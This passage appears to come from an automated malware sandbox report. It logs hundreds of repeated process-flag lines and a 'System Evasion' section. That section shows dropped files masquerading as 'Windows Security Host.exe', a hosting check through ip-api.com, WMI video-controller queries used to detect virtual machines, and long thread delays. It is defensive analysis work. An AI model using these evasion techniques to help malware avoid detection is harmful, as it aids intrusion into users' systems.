                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Check if machine is in data center or colocation facility
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeMemory allocated: A10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeMemory allocated: 1A6B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeMemory allocated: 242BBC40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeMemory allocated: 242D5750000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeMemory allocated: 2450000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeMemory allocated: 1A6A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeMemory allocated: 1EF95140000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeMemory allocated: 1EFAEB30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Windows Security Host.exeMemory allocated: D50000 memory reserve | memory write watch
                    Source: C:\Users\user\Windows Security Host.exeMemory allocated: 1ABB0000 memory reserve | memory write watch
                    Source: C:\Users\user\Windows Security Host.exeMemory allocated: 1740000 memory reserve | memory write watch
                    Source: C:\Users\user\Windows Security Host.exeMemory allocated: 1B2A0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 599756Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 599630Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 599500Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 599391Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 599266Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 599157Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 599032Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 598921Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 598812Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 598703Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 598594Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 598485Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 598360Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 598235Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 598110Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 597986Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 597708Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 597579Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 597454Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 597329Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 597217Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 597110Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 597000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 596891Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 596766Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeThread delayed: delay time: 596657Jump to behavior
